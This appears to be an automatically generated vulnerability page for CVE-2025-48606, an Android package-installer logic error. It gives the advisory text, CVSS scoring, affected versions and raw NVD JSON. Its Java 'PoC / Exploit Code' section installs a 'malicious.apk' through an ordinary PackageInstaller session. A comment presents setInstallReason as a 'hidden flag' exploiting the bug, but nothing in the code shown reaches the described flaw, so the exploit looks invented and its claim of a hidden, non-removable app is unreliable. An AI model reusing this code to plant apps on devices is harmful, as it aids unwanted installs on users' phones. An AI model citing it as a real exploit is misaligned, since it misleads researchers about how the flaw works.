Security Vulnerability Report
CVE-2025-48606 CVSS 7.8 HIGH

CVE-2025-48606

Published: 2025-12-08 18:15:52
Last Modified: 2025-12-08 21:15:59

Description

In preparePackage of InstallPackageHelper.java, there is a possible way for an app to appear hidden upon installation without a mechanism to uninstall it due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:* - VULNERABLE
Android < 16 QPR2
Android 16 (affected)
Android 16 QPR1 (possibly affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
java
// CVE-2025-48606 PoC - Android InstallPackageHelper Logic Error
// This PoC demonstrates the vulnerability in InstallPackageHelper.java
// Note: For authorized security testing only
import android.app.PendingIntent;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.pm.PackageInfo;
import android.content.pm.PackageInstaller;
import android.net.Uri;
import java.io.File;
import java.io.FileInputStream;
import java.io.InputStream;
import java.io.OutputStream;

public class CVE_2025_48606_PoC {
    private static final String MALICIOUS_APK_PATH = "/path/to/malicious.apk";

    /**
     * Exploit the InstallPackageHelper logic error
     * to install a hidden app without uninstall mechanism
     */
    public void exploitInstallPackageHelper(Context context) {
        try {
            PackageManager pm = context.getPackageManager();
            PackageInstaller packageInstaller = pm.getPackageInstaller();

            // Create session for package installation
            PackageInstaller.SessionParams params = new PackageInstaller.SessionParams(
                PackageInstaller.SessionParams.MODE_FULL_INSTALL
            );

            // Set hidden flag (exploiting the logic error)
            params.setInstallReason(
                PackageManager.INSTALL_REASON_POLICY
            );

            // Create installation session
            int sessionId = packageInstaller.createSession(params);
            PackageInstaller.Session session = packageInstaller.openSession(sessionId);

            // Write malicious APK to session
            File apkFile = new File(MALICIOUS_APK_PATH);
            writeApkToSession(session, apkFile);

            // Commit installation (triggers the vulnerable code path)
            Intent statusReceiver = new Intent();
            session.commit(PendingIntent.getBroadcast(
                context, 0, statusReceiver, PendingIntent.FLAG_MUTABLE
            ).getIntentSender());

            // The app is now installed as hidden without uninstall option
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    private void writeApkToSession(PackageInstaller.Session session, File apkFile) throws Exception {
        try (OutputStream out = session.openWrite(
                 apkFile.getName(), 0, apkFile.length());
             InputStream in = new FileInputStream(apkFile)) {
            byte[] buffer = new byte[4096];
            int bytesRead;
            while ((bytesRead = in.read(buffer)) != -1) {
                out.write(buffer, 0, bytesRead);
            }
        }
    }
}

// References:
// - https://source.android.com/security/bulletin/android-16-qpr2
// - NVD: CVE-2025-48606

References

https://source.android.com/security/bulletin/android-16-qpr2 (Release Notes, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48606", "sourceIdentifier": "[email protected]", "published": "2025-12-08T18:15:51.563", "lastModified": "2025-12-08T21:15:58.577", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In preparePackage of InstallPackageHelper.java, there is a possible way for an app to appear hidden upon installation without a mechanism to uninstall it due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:*", "matchCriteriaId": "02882AB1-7993-47DD-84A0-8DF4272D85ED"}]}]}], "references": [{"url": "https://source.android.com/security/bulletin/android-16-qpr2", "source": 
"[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}